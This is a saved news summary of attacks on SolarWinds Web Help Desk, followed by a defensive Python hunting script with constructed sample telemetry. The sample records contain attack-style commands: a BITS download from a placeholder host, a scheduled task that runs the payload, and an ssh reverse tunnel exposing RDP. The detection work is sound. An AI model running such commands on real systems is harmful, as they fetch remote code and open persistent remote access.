Saved February 14, 2026
Do you care about this?
Attackers exploited vulnerabilities in SolarWinds Web Help Desk to steal high-privilege credentials from various organizations. Microsoft is investigating which specific flaws were used, as multiple recent and old CVEs are in play. Security teams are advised to apply patches and monitor for unauthorized remote management tools.
If you do, here's more
SolarWinds' Web Help Desk (WHD) is under attack, with cybercriminals exploiting vulnerabilities to steal high-privilege credentials. Microsoft researchers reported that these attacks occurred in December 2025, but they have yet to identify the specific flaw used. The intruders may have taken advantage of recently disclosed vulnerabilities like CVE-2025-40551 and CVE-2025-40536, or older ones like CVE-2025-26399. All these vulnerabilities involve critical security weaknesses that can allow unauthenticated attackers to execute commands remotely.
Once attackers compromised WHD instances, they utilized PowerShell and the Background Intelligent Transfer Service (BITS) to download and execute malware. This method, known as "living off the land," takes advantage of existing system tools, making detection harder. The intruders also installed Zoho ManageEngine, a legitimate remote management tool, to maintain access and control over the compromised systems. They enumerated sensitive user groups and established reverse SSH and RDP connections for persistence.
In some cases, they created scheduled tasks to hide malicious activity within a virtualized environment and escalated their privileges to extract password data from domain controllers. Microsoft advises immediate action: patch WHD vulnerabilities, remove public access to administrative paths, and scan for unauthorized remote management tools. Rotating credentials for service and admin accounts reachable from WHD is also recommended, along with isolating any compromised hosts.
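The behaviours described in the two paragraphs above (a shell or task spawned by the WHD service, BITS transfers started from PowerShell, a remote-management agent that is not on the approved list, and ssh started with a remote port forward) map onto simple hunting rules over process-creation telemetry. The following is an added example, not code from the article or from Microsoft or SolarWinds; the record fields, the WHD install path, the sanctioned-agent path and every log line are constructed assumptions for illustration.

```python
"""Hunting rules for the WHD post-exploitation behaviour described above.

Input is a list of process-creation records as a SIEM or EDR might export them.
Every record below is CONSTRUCTED; paths, hosts and addresses are placeholders.
"""
import re

# Assumption: the WHD service runs from an install path containing one of these.
WHD_PATH_HINTS = ("webhelpdesk", "solarwinds")
# Assumption: the only sanctioned remote-management agent in this environment.
APPROVED_RMM_PATHS = {r"c:\program files\manageengine\remoteaccessplus\agent.exe"}
# Name fragments of remote-management agents worth flagging (article names ManageEngine).
RMM_NAME_HINTS = ("manageengine",)
# Binaries that should never be children of a web-application service.
SHELL_OR_TASK = {"powershell.exe", "pwsh.exe", "cmd.exe", "schtasks.exe"}

BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(?:\.exe)?\s+/transfer", re.I)
SSH_REMOTE_FWD_RE = re.compile(r"(?:^|\s)-R\b")  # ssh -R <port>:<host>:<port>


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_bits_via_powershell(rec):
    img = basename(rec["image"])
    if img in {"powershell.exe", "pwsh.exe", "bitsadmin.exe"} and BITS_RE.search(rec["command_line"]):
        return "BITS transfer launched from PowerShell/bitsadmin"
    return None


def rule_unapproved_rmm(rec):
    img_path = rec["image"].lower()
    if any(h in img_path for h in RMM_NAME_HINTS) and img_path not in APPROVED_RMM_PATHS:
        return "remote-management agent not on the approved list"
    return None


def rule_reverse_ssh(rec):
    if basename(rec["image"]) == "ssh.exe" and SSH_REMOTE_FWD_RE.search(rec["command_line"]):
        return "ssh started with a remote port forward (-R)"
    return None


def rule_spawned_by_whd(rec):
    parent = rec.get("parent_image", "").lower()
    if basename(rec["image"]) in SHELL_OR_TASK and any(h in parent for h in WHD_PATH_HINTS):
        return "shell or scheduled-task binary spawned by the WHD service process"
    return None


RULES = (rule_bits_via_powershell, rule_unapproved_rmm, rule_reverse_ssh, rule_spawned_by_whd)


def analyze(records):
    """Run every rule over every record; one finding per (record, rule) hit."""
    findings = []
    for rec in records:
        for rule in RULES:
            reason = rule(rec)
            if reason:
                findings.append({"host": rec["host"], "rule": rule.__name__,
                                 "reason": reason, "command_line": rec["command_line"]})
    return findings


# Constructed sample telemetry (TEST-NET addresses, placeholder paths).
SAMPLE_RECORDS = [
    {"host": "whd-srv01", "parent_image": r"C:\Program Files\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -Command Start-BitsTransfer -Source http://198.51.100.7/u.bin -Destination C:\Users\Public\u.bin"},
    {"host": "whd-srv01", "parent_image": r"C:\Program Files\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks.exe /create /tn Updater /tr C:\Users\Public\u.bin /sc minute"},
    {"host": "whd-srv01", "parent_image": r"C:\Users\Public\u.bin",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "command_line": "ssh.exe -N -R 2222:127.0.0.1:3389 ops@203.0.113.9"},
    {"host": "fs02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\admin\Downloads\ManageEngine_Setup.exe",
     "command_line": "ManageEngine_Setup.exe /silent"},
    {"host": "ws17", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Get-Process"},
    {"host": "ws17", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\ManageEngine\RemoteAccessPlus\agent.exe",
     "command_line": "agent.exe -service"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print(f"{f['host']}: {f['reason']} :: {f['command_line']}")
```

Run as-is, the first record raises two findings (the BITS download and the fact that the WHD service spawned PowerShell at all), the scheduled task and the `ssh -R` session one each, and the unlisted ManageEngine installer one; the two benign records on `ws17` stay quiet because the allowlist is keyed on the full agent path rather than the product name. The parent-process rule is the broadest of the four and is the one worth keeping permanently: a web-application service has no legitimate reason to launch a shell or `schtasks.exe`, whichever CVE was used to get there.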